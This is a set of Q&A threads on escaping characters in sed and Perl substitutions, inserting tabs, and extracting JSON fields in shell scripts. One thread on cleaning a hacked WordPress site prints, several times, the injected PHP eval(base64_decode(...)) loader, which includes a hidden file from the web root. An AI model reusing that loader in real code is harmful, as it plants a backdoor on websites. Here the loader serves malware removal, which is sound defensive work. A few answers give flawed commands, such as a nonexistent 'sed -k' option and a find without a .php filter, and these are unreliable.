escape reserved chars from a regexp(sed) parameter - regex

I want to write a script that modifies a variable in a .properties file. The user enters the new value which is in turn written into the file.
read -p "Input Variable?" newVar
sed -r 's/^\s*myvar=.*/myvar=${newVar}/' ./config.properties
Unfortunately problems arise when the user inputs special characters. In my use case it is very likely that a "/" character is typed. So my guess is that I have to parse ${newVar} for all slashes and escape them? But how? Is there a better way?

have a look at bash printf
%q quote the argument in a way that can be reused as shell input
Example:
$ printf "%q" "input with special characters // \\ / \ $ # #"
input\ with\ special\ characters\ //\ \\\ /\ \\\ \$\ #\ #

Avoiding shell quoting is a good general principle.
#! /usr/bin/env perl
use strict;
use warnings;
die "Usage: $0 properties-file ..\n" unless @ARGV;
print "New value for myvar?\n";
chomp(my $new = <STDIN>);
$^I = ".bak";
while (<>) {
s/^(\s*myvar\s*=\s*).*$/$1$new/;
print;
}
Substitution with s/// as above will be familiar to sed users.
The code above uses Perl's in-place editing facility (enabled most commonly with the -i switch but above with the special $^I variable) to modify files named on the command line and create backups with the .bak extension.
Example usage:
$ cat foo.properties
theirvar=123
myvar=FIXME
$ ./prog foo.properties
New value for myvar?
foo\bar
$ cat foo.properties
theirvar=123
myvar=foo\bar
$ cat foo.properties.bak
theirvar=123
myvar=FIXME

Edit: oops, we are only quoting the value, not the regex. So this is what you need:
You are better off using perl instead of sed for this if it is available.
read -p "Input Variable?" newVar
perl -i -p -e 'BEGIN{$val=shift;}' \
-e 's/^\s*myvar=.*/myvar=$val/' \
"$newVar" ./config.properties
Edit2: Sorry, still does not handle \ characters in newVar. Guess one of the other solutions is better. As stated before, dealing with shell escaping is your issue.

You are better off using a tool that understands variables -- Perl, maybe AWK -- trying to quote a random string so that you avoid all unintended interactions with sed command parsing is asking for trouble.
Also, you won't get your variable interpolated when using single quotes, and even with -r, sed does not grok Perl regex syntax -- -r only gets you to the egrep version of regexes, so \s is not guaranteed to do what you want (GNU sed accepts it as an extension; other seds may not).
Anyway, ignoring my own advice, here's how we'd do it in the old days before we had those better tools:
read -p "Input Variable?" newVar
sed "/^ *myvar=/c\\
myvar=`echo \"$newVar\" | sed 's/\\\\/\\\\\\\\/'`" ./config.properties
If you don't think your users will figure out how to input literal backslashes at your prompt, you can simplify this to:
read -p "Input Variable?" newVar
sed "/^ *myvar=/c\\
myvar=$newVar" ./config.properties
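If sed has to stay, one hedged option is to escape the user's input before it is spliced into the replacement. The sketch below assumes the / delimiter and single-line input; escape_sed_replacement and set_myvar are made-up helper names, not part of any tool. It also assumes the value is read with read -r, so that the shell does not strip backslashes first.

```shell
#!/bin/sh
# Hypothetical helper: make a string safe as the replacement of s/.../.../
# by putting a backslash in front of every "\", "/" and "&".
escape_sed_replacement() {
    printf '%s\n' "$1" | sed 's|[\\/&]|\\&|g'
}

# Hypothetical helper: print FILE ($2) with myvar set to the literal value $1.
set_myvar() {
    escaped=$(escape_sed_replacement "$1")
    sed "s/^[[:space:]]*myvar=.*/myvar=$escaped/" "$2"
}

# Usage sketch (interactive):
#   read -r -p "Input Variable? " newVar   # -p is a bash extension
#   set_myvar "$newVar" ./config.properties
```

The escaping step uses | as its own delimiter so that the slash can sit in the bracket expression without any delimiter ambiguity.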

Related

Using sed with regex to find and replace a string

So I have the following string in my config.fish, and init.vim:
Fish: eval sh ~/.config/fish/colors/base16-monokai.dark.sh
Vim: colorscheme base16-monokai
Vim: let g:airline_theme='base16_monokai'
And I have the following shell script:
#!/bin/sh
theme=$1
background=$2
if [ -z '$theme' ]; then
echo "Please provide a theme name."
else
if [ -z '$background' ]; then
$background = 'dark'
fi
base16-builder -s $theme -t vim -b $background > ~/.config/nvim/colors/base16-$theme.vim &&
base16-builder -s $theme -t shell -b $background > ~/.config/fish/colors/base16-$theme.$background.sh &&
base16-builder -s $theme -t vim-airline -b $background > ~/.vim/plugged/vim-airline-themes/autoload/airline/themes/base16_$theme.vim
sed -i -e 's/foo/eval sh ~/.config/fish/colors/base16-$theme.$background.sh/g' ~/Developer/dotfiles/config.fish
sed -i -e 's/foo/colorscheme base16-$theme/g' ~/Developer/dotfiles/init.vim
sed -i -e 's/foo/let g:airline_theme='base16_$theme'/g' ~/Developer/dotfiles/init.vim
fi
Basically the idea is the script will generate whichever theme is passed through using this builder.
I have tried referring this documentation but I am not very skilled at regex so if anybody could give me a hand I would appreciate it.
What I need to happen is once the script is generated sed will look for the above strings and replace theme with the newly generated theme ones.
Try this :
sed -i "s|\(eval sh ~/\.config/fish/colors/base16-\)\([^.]*\)\.\([^.]*\)\(.*\)|\1$theme.$background\4|" ~/Developer/dotfiles/config.fish
sed -i "s/\(base16\)\([-_]\)\([a-zA-Z]*\)/\1\2$theme/g" ~/Developer/dotfiles/init.vim
Assuming in the second sed command that the theme is an alphanumeric string. If not, you can complete the character range : [a-zA-Z] with additional characters (eg [a-zA-Z0-9]).
You can replace something in sed using this syntax: sed "s#regex#replacement#g". Because you have /s and 's in your strings, it's easiest not to need to escape them.
There are some characters that need to be escaped to make the regexes. . and $ need to be escaped with a \. The $ in the replacement string needs to be escaped too.
If you want to capture a certain part from match, it's easiest to use char classes. For example, eval sh ~/\.config/fish/colors/base16-([^.]+)\.dark\.sh would be the regex to use if you want your replacement to be airline_theme='$1_base16_\$theme'. In that case, the $1 in the replacement is the thing captured in the regex.
[^.]+ will capture everything up to the next .
I hope this helps you to better understand regexes! This should be detailed enough to show you how to write your own.
You need to use double quotes for parameter expansion not single quotes.
You need to escape the single quotes: 'hello'\''world'
I will make one line for you and leave it as an exercise to fix the other lines
sed -i -e 's~\(let g:airline_theme='\''\)[^'\'']*\('\''\)~\1base16_'"$theme"'\2~' ~/Developer/dotfiles/init.vim
The first character after the s in the sed expression string is used as the pattern separator, so by putting / first you have specified / as the separator.
Additionally using the single quote tells the shell not to expand any variables, you are going to want to use double quotes instead.
try something like
sed -i -e "s#foo#eval sh ~/.config/fish/colors/base16-$theme.$background.sh#g" ~/Developer/dotfiles/config.fish
as you've now commented that you needed to find the previous theme string instead of foo
sed -i -e "s#eval sh ~/\.config/fish/colors/base16-[^.]*\.[^.]*\.sh#eval sh ~/.config/fish/colors/base16-$theme.$background.sh#g" ~/Developer/dotfiles/config.fish
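Putting the two points together (a delimiter that does not occur in the path, and double quotes so the shell expands the variables), a minimal sketch might look like this. retheme is a made-up function name, and the sketch assumes theme and background names contain no dots, no # and no &.

```shell
#!/bin/sh
# Hypothetical filter: rewrite base16-<theme>.<background>.sh on stdin.
# $1 = new theme, $2 = new background
retheme() {
    sed "s#base16-[^.]*\.[^.]*\.sh#base16-$1.$2.sh#"
}

printf '%s\n' 'eval sh ~/.config/fish/colors/base16-monokai.dark.sh' |
    retheme ocean light
# prints: eval sh ~/.config/fish/colors/base16-ocean.light.sh
```

Using [^.]* rather than .* keeps each piece from running past the next dot, which sed's greedy matching would otherwise do.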

unmatched parenthesis in regex - Linux

I want to replace (whole string)
$(TOPDIR)/$(OSSCHEMASDIRNAME)
with
/udir/makesh/$(OSSCHEMASDIRNAME)
in a makefile
I tried with
perl -pi.bak -e "s/\$\(TOPDIR\)\/\$\(OSSCHEMASDIRNAME\)/\/udir\/makesh\/\$\(OSSCHEMASDIRNAME\)/g " makefile
but i am getting unmatched parentheses error
You have to "double" escape the dollar sign. Like this:
echo "\$(TOPDIR)/\$(OSSCHEMASDIRNAME)" | perl -p -e "s/\\$\(TOPDIR\)\/\\$\(OSSCHEMASDIRNAME\)/\/udir\/makesh\/\\$\(OSSCHEMASDIRNAME\)/g"
First off, you don't need to use / for regular expressions. They're just canonical. You can use pretty much anything. Thus your code can become (simplify away some \):
perl -pi.bak -e "s|\$\(TOPDIR\)/\$\(OSSCHEMASDIRNAME\)|/udir/makesh/\$\(OSSCHEMASDIRNAME\)|g " makefile
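Now to actually address your issue: because you're using " instead of ', the shell turns \$ into a plain $ before Perl ever runs. Perl then sees $\ (its output record separator variable), replaces it with (presumably) nothing, and is left with an unmatched parenthesis. So what you really want is: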
perl -p -i.bak -e 's|\$\(TOPDIR\)/\$\(OSSCHEMASDIRNAME\)|/udir/makesh/\$\(OSSCHEMASDIRNAME\)|g' makefile
When in doubt about escaping, you can simply use quotemeta or \Q ... \E.
perl -pe 's#\Q$(TOPDIR)\E(?=/\Q$(OSSCHEMASDIRNAME)\E)#/udir/makesh#;'
Note the use of a look-ahead assertion to save us the trouble of repeating the trailing part in the substitution.
A quotemeta solution would be something like:
perl -pe 'BEGIN { $dir = quotemeta(q#$(TOPDIR)/$(OSSCHEMASDIRNAME)#); }
s#$dir#/udir/makesh/$(OSSCHEMASDIRNAME)#;'
Of course, you don't need to use an actual one-liner. When the shell quoting is causing troubles, the simplest option of them all is to write a small source file for your script:
s#\Q$(TOPDIR)\E(?=/\Q$(OSSCHEMASDIRNAME)\E)#/udir/makesh#;
And run with:
perl -p source.pl inputfile
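For comparison, here is a sketch of the same substitution done with sed instead of Perl (a swapped-in tool, not what the answers above use). Inside single quotes the shell leaves $ alone, and in a basic regular expression unescaped parentheses are literal, so only the dollar signs need a backslash. fix_topdir and the sample makefile line are made up for illustration.

```shell
#!/bin/sh
# Hypothetical filter: replace $(TOPDIR)/$(OSSCHEMASDIRNAME) on stdin.
fix_topdir() {
    sed 's|\$(TOPDIR)/\$(OSSCHEMASDIRNAME)|/udir/makesh/$(OSSCHEMASDIRNAME)|g'
}

# Made-up sample line standing in for the makefile content.
printf '%s\n' 'SCHEMAS = $(TOPDIR)/$(OSSCHEMASDIRNAME)' | fix_topdir
# prints: SCHEMAS = /udir/makesh/$(OSSCHEMASDIRNAME)
```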

Command line find a large string and replace on all files in a subdirectory

I've got a hacked wordpress install I'd like to clean up. Every single .php file has had this inserted at the top:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
I'd like to replace that string with nothing in every .php file in the wordpress directory including subs. What's my best option? I've got bash, python, perl, php and so on.
I've tried:
perl -pi -e 's/<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>//g' *.php
Bareword found where operator expected at -e line 1, near "s/<?php\ /**/eval"
syntax error at -e line 1, near "s/<?php\ /**/eval"
Identifier too long at -e line 1.
and
sed -i 's/<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>//g' *.php
sed: -e expression #1, char 15: unknown option to `s'
#!/usr/bin/perl
use warnings;
use strict;
use File::Find;
# get a list of files
local @ARGV;
find sub {push @ARGV, $File::Find::name if /\.php$/}, '.';
# do in-place editing
$^I = '.bak';
while (<>) {
print unless $_ eq "<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>\n";
}
Note that your search string already contains '/', which is the default regex delimiter and the one you are using in both your perl and sed commands.
You can either escape all those like '\/' OR you can use a different char for the reg-exp delimiter. For sed, try
sed -i 's#<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>##g' *.php
For some seds, you have to 'tell' sed that you are changing the delimiter; only the initial regex delimiter needs an escape character, i.e. sed -k 's\#<....##g' *.php
I hope this helps.
P.S. as you appear to be a new user, if you get an answer that helps you please remember to mark it as accepted, and/or give it a + (or -) as a useful answer.
The problem is that '/' exists in the string you want to match, and you are using '/' as your pattern delimiter. Luckily, Perl allows you to specify alternate delimiters, so use one that is not in the string you are matching:
perl -pn -i.bak -e "s{<?php\ /\*\*/eval\(base64_decode\('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\)\);\ \?>}{}g;" `find . -name '*.php'`
I modified the command a bit. It is always good practice to create backup files when doing in-place edits in case there is an error or you need to verify (via diff) that the command did what you expect (I have a perl program that allows me to easily rename the .bak files back in case I need to reset things).
I also use a find command to get the list of all .php files in and below the current directory. If working in a flat directory, your *.php is sufficient.
You also need to escape regex specials in the string you want to match. For example, the '*', '?', and '()' characters need to be escaped.
If the command works as expected, you can run the following command to remove the .bak files:
/bin/rm `find . -name '*.bak'`
find ./*php | xargs -t -i perl -pi -e "s/<\?php\s+\/\*\*\/eval\(base64_decode\(\'\S+\'\)\);\s+\?>//;" {}
Feel free to substitute the ginormous base64 string instead of \S+
Try this:
sed -i -r 's/<\?php\ \/\*\*\/eval\(base64_decode\('\''aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\''\)\); \?>//' *.php
Things I changed:
escaped all regexp symbols in your code (e.g. (, ), * and ?)
replaced ' with '\'' in your code, which is the only way to put a ' in a '-delimited string in bash
If you want to recursively replace *.php even in subdirectories of this directory:
find -print0 | xargs -0 sed -i -r 's/<\?php\ \/\*\*\/eval\(base64_decode\('\''aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\''\)\); \?>//'
Note that I've used -print0 and -0 so it doesn't break with files with spaces.
Here's a bash 4+ script
#!/bin/bash
shopt -s globstar
shopt -s nullglob
for php in **/*.php
do
data=$(<"$php")
a=${data%%<?php*}
echo "$a ${data#*?>}" > t && mv t "$php"
done
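Since the injected code is one fixed line, another option is to skip regular expressions altogether and compare whole lines as fixed strings. The sketch below assumes the injected text sits on a line of its own (as the File::Find script above also assumes) and that file names contain no newlines. strip_line and strip_tree are made-up names, and the needle in the usage note is shortened to a placeholder.

```shell
#!/bin/sh
# Hypothetical helper: rewrite FILE ($2) without the lines that are exactly NEEDLE ($1).
strip_line() {
    tmp=$(mktemp) || return 1
    # -F: fixed string (no regex), -x: match whole lines, -v: keep the others.
    # grep exits 1 when nothing is left to print; only a status above 1 is an error.
    grep -vxF -e "$1" "$2" > "$tmp" || [ $? -eq 1 ] || { rm -f "$tmp"; return 1; }
    cat "$tmp" > "$2"   # overwrite in place, keeping the file's permissions
    rm -f "$tmp"
}

# Hypothetical helper: apply strip_line to every .php file below DIR ($2).
strip_tree() {
    find "$2" -type f -name '*.php' | while IFS= read -r f; do
        strip_line "$1" "$f"
    done
}

# Usage sketch; paste the full injected line in place of the placeholder:
#   strip_tree "<?php /**/eval(base64_decode('...')); ?>" .
```

Because nothing in the needle is interpreted as a pattern, none of the /, *, ? or parenthesis escaping discussed above is needed. Take a backup first, since the files are overwritten.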

Why is sed not recognizing \t as a tab?

sed "s/\(.*\)/\t\1/" $filename > $sedTmpFile && mv $sedTmpFile $filename
I am expecting this sed script to insert a tab in front of every line in $filename however it is not. For some reason it is inserting a t instead.
Not all versions of sed understand \t. Just insert a literal tab instead (press Ctrl-V then Tab).
Using Bash you may insert a TAB character programmatically like so:
TAB=$'\t'
echo 'line' | sed "s/.*/${TAB}&/g"
echo 'line' | sed 's/.*/'"${TAB}"'&/g' # use of Bash string concatenation
@sedit was on the right path, but it's a bit awkward to define a variable.
Solution (bash specific)
The way to do this in bash is to put a dollar sign in front of your single quoted string.
$ echo -e '1\n2\n3'
1
2
3
$ echo -e '1\n2\n3' | sed 's/.*/\t&/g'
t1
t2
t3
$ echo -e '1\n2\n3' | sed $'s/.*/\t&/g'
	1
	2
	3
If your string needs to include variable expansion, you can put quoted strings together like so:
$ timestamp=$(date +%s)
$ echo -e '1\n2\n3' | sed "s/.*/$timestamp"$'\t&/g'
1491237958 1
1491237958 2
1491237958 3
Explanation
In bash $'string' causes "ANSI-C expansion". And that is what most of us expect when we use things like \t, \r, \n, etc. From: https://www.gnu.org/software/bash/manual/html_node/ANSI_002dC-Quoting.html#ANSI_002dC-Quoting
Words of the form $'string' are treated specially. The word expands
to string, with backslash-escaped characters replaced as specified by
the ANSI C standard. Backslash escape sequences, if present, are
decoded...
The expanded result is single-quoted, as if the dollar sign had not
been present.
Solution (if you must avoid bash)
I personally think most efforts to avoid bash are silly because avoiding bashisms does NOT* make your code portable. (Your code will be less brittle if you shebang it to bash -eu than if you try to avoid bash and use sh [unless you are an absolute POSIX ninja].) But rather than have a religious argument about that, I'll just give you the BEST* answer.
$ echo -e '1\n2\n3' | sed "s/.*/$(printf '\t')&/g"
	1
	2
	3
* BEST answer? Yes, because one example of what most anti-bash shell scripters would do wrong in their code is use echo '\t' as in @robrecord's answer. That will work for GNU echo, but not BSD echo. That is explained by The Open Group at http://pubs.opengroup.org/onlinepubs/9699919799/utilities/echo.html#tag_20_37_16 And this is an example of why trying to avoid bashisms usually fails.
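As a sketch of that portable route, the tab can be produced once with printf and reused. indent is a made-up function name. Command substitution only strips trailing newlines, so the tab survives in TAB.

```shell
#!/bin/sh
# A literal tab, produced by printf rather than echo.
TAB=$(printf '\t')

# Hypothetical filter: put one tab in front of every input line.
indent() {
    sed "s/^/$TAB/"
}

printf '1\n2\n3\n' | indent
```

sed never sees a \t escape here; the shell has already placed a real tab character in the script.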
I've used something like this with a Bash shell on Ubuntu 12.04 (LTS):
To append a new line with tab,second when first is matched:
sed -i '/first/a \\t second' filename
To replace first with tab,second:
sed -i 's/first/\\t second/g' filename
Use $(echo '\t'). You'll need quotes around the pattern.
Eg. To remove a tab:
sed "s/$(echo '\t')//"
You don't need to use sed to do a substitution when, in actual fact, you just want to insert a tab in front of the line. Substitution for this case is an expensive operation compared to just printing the line out, especially when you are working with big files. It's easier to read too, as it's not a regex.
eg using awk
awk '{print "\t"$0}' $filename > temp && mv temp $filename
I used this on Mac:
sed -i '' $'$i\\\n\\\thello\n' filename
Not every sed supports \t (GNU sed does; some BSD seds do not), and the same goes for some other escape sequences. The only way I've found that works everywhere is to put an actual tab character into the sed script.
That said, you may want to consider using Perl or Python. Here's a short Python script I wrote that I use for all stream regex'ing:
#!/usr/bin/env python3
import re
import sys

def main(args):
    if len(args) < 2:
        print('Usage: <search-pattern> <replace-expr>', file=sys.stderr)
        raise SystemExit(1)
    # MULTILINE and DOTALL let the pattern work across line boundaries.
    p = re.compile(args[0], re.MULTILINE | re.DOTALL)
    s = sys.stdin.read()
    # end='' avoids adding a newline that was not in the input.
    print(p.sub(args[1], s), end='')

if __name__ == '__main__':
    main(sys.argv[1:])
Instead of BSD sed, i use perl:
ct@MBA45:~$ python -c "print('\t\t\thi')" |perl -0777pe "s/\t/ /g"
hi
I think others have clarified this adequately for other approaches (sed, AWK, etc.). However, my bash-specific answers (tested on macOS High Sierra and CentOS 6/7) follow.
1) If OP wanted to use a search-and-replace method similar to what they originally proposed, then I would suggest using perl for this, as follows. Notes: backslashes before parentheses for regex shouldn't be necessary, and this code line reflects how $1 is better to use than \1 with perl substitution operator (e.g. per Perl 5 documentation).
perl -pe 's/(.*)/\t$1/' $filename > $sedTmpFile && mv $sedTmpFile $filename
2) However, as pointed out by ghostdog74, since the desired operation is actually to simply add a tab at the start of each line before changing the tmp file to the input/target file ($filename), I would recommend perl again but with the following modification(s):
perl -pe 's/^/\t/' $filename > $sedTmpFile && mv $sedTmpFile $filename
## OR
perl -pe $'s/^/\t/' $filename > $sedTmpFile && mv $sedTmpFile $filename
3) Of course, the tmp file is superfluous, so it's better to just do everything 'in place' (adding -i flag) and simplify things to a more elegant one-liner with
perl -i -pe $'s/^/\t/' $filename
TAB=$(printf '\t')
sed "s/${TAB}//g" input_file
This works for me on Red Hat; it strips the tabs from the contents of the input file.
If you know that certain characters are not used, you can translate "\t" into something else.
cat my_file | tr "\t" "," | sed "s/\(.*\)/,\1/"

Using regular expressions in shell script

What is the correct way to parse a string using regular expressions in a linux shell script? I wrote the following script to print my SO rep on the console using curl and sed (not solely because I'm rep-crazy - I'm trying to learn some shell scripting and regex before switching to linux).
json=$(curl -s http://stackoverflow.com/users/flair/165297.json)
echo $json | sed 's/.*"reputation":"\([0-9,]\{1,\}\)".*/\1/' | sed s/,//
But somehow I feel that sed is not the proper tool to use here. I heard that grep is all about regex and explored it a bit. But apparently it prints the whole line whenever a match is found - I am trying to extract a number from a single line of text. Here is a downsized version of the string that I'm working on (returned by curl).
{"displayName":"Amarghosh","reputation":"2,737","badgeHtml":"\u003cspan title=\"1 silver badge\"\u003e\u003cspan class=\"badge2\"\u003e●\u003c/span\u003e\u003cspan class=\"badgecount\"\u003e1\u003c/span\u003e\u003c/span\u003e"}
I guess my questions are:
What is the correct way to parse a string using regular expressions in a linux shell script?
Is sed the right thing to use here?
Could this be done using grep?
Is there any other command that's easier or more appropriate?
The grep command will select the desired line(s) from many but it will not directly manipulate the line. For that, you use sed in a pipeline:
someCommand | grep 'Amarghosh' | sed -e 's/foo/bar/g'
Alternatively, awk (or perl if available) can be used. It's a far more powerful text processing tool than sed in my opinion.
someCommand | awk '/Amarghosh/ { do something }'
For simple text manipulations, just stick with the grep/sed combo. When you need more complicated processing, move on up to awk or perl.
My first thought is to just use:
echo '{"displayName":"Amarghosh","reputation":"2,737","badgeHtml"' |
sed -e 's/.*tion":"//' -e 's/".*//' -e 's/,//g'
which keeps the number of sed processes to one (you can give multiple commands with -e).
You may be interested in using Perl for such tasks. As a demonstration, here is a Perl script which prints the number you want:
#!/usr/local/bin/perl
use warnings;
use strict;
use LWP::Simple;
use JSON;
my $url = "http://stackoverflow.com/users/flair/165297.json";
my $flair = get ($url);
my $parsed = from_json ($flair);
print "$parsed->{reputation}\n";
This script requires you to install the JSON module, which you can do with just the command cpan JSON.
For working with JSON in a shell script, use jsawk, which is like awk but for JSON.
json=$(curl -s http://stackoverflow.com/users/flair/165297.json)
echo $json | jsawk 'return this.reputation' # 2,747
My proposition:
$ echo $json | sed 's/,//g;s/^.*reputation...\([0-9]*\).*$/\1/'
I put two commands in sed argument:
s/,//g is used to remove all commas, in particular the ones that are present in the reputation value.
s/^.*reputation...\([0-9]*\).*$/\1/ locates the reputation value in the line and replaces the whole line by that value.
In this particular case, I find that sed provides the most compact command without loss of readability.
Other tools for manipulating strings (not only regex) include:
grep, awk, perl mentioned in most of other answers
tr for replacing characters
cut, paste for handling multicolumn inputs
bash itself with its rich ${...} syntax for accessing variables
tail, head for keeping last or first lines of a file
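As an illustration of the shell's own variable syntax from the list above, the value can be cut out with POSIX parameter expansion and no regex at all. This is only a sketch: it assumes the key appears exactly as "reputation":" and it is no substitute for a JSON parser. extract_reputation is a made-up name, and the sample JSON is shortened.

```shell
#!/bin/sh
# Hypothetical helper: print the reputation value from the JSON text in $1.
extract_reputation() {
    rest=${1#*\"reputation\":\"}   # drop everything up to and including "reputation":"
    value=${rest%%\"*}             # keep what precedes the next double quote
    printf '%s\n' "$value" | tr -d ','   # remove the thousands separators
}

# Shortened sample of the flair JSON (badgeHtml elided).
json='{"displayName":"Amarghosh","reputation":"2,737","badgeHtml":"..."}'
extract_reputation "$json"
# prints: 2737
```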
sed is appropriate, but you'll spawn a new process for every sed you use (which may be too heavyweight in more complex scenarios). grep is not really appropriate. It's a search tool that uses regexps to find lines of interest.
Perl is one appropriate solution here, being a shell scripting language with powerful regexp features. It'll do most everything you need without spawning out to separate processes (unlike normal Unix shell scripting) and has a huge library of additional functions.
You can do it with grep. There is a -o switch in grep which extracts only the matching string, not the whole line.
$ echo $json | grep -o '"reputation":"[0-9,]\+"' | grep -o '[0-9,]\+'
2,747
1) What is the correct way to parse a string using regular expressions in a linux shell script?
Tools with regular expression capabilities include sed, grep, awk, Perl and Python, to mention a few. Even newer versions of Bash have regex capabilities. All you need to do is look up the docs on how to use them.
2) Is sed the right thing to use here?
It can be, but it isn't necessary.
3) Could this be done using grep?
Yes, it can. You construct a regex similar to the one you would use with sed or the other tools. Note that grep only searches; if you want to modify any files, it will not do that for you.
4) Is there any other command that's easier/more appropriate?
Of course. Regex can be powerful, but it's not necessarily the best tool to use every time. It also depends on what you mean by "easier/appropriate".
Another method that needs minimal fuss with regex is the fields/delimiter approach: you look for patterns that the input can be split on. For example, in your case (I downloaded the 165297.json file instead of using curl, but it's the same):
awk 'BEGIN{
FS="reputation" # split on the word "reputation"
}
{
m=split($2,a,"\",\"") # field 2 holds the value you want plus the rest;
# split it on "," (quote, comma, quote) and save the pieces to array "a"
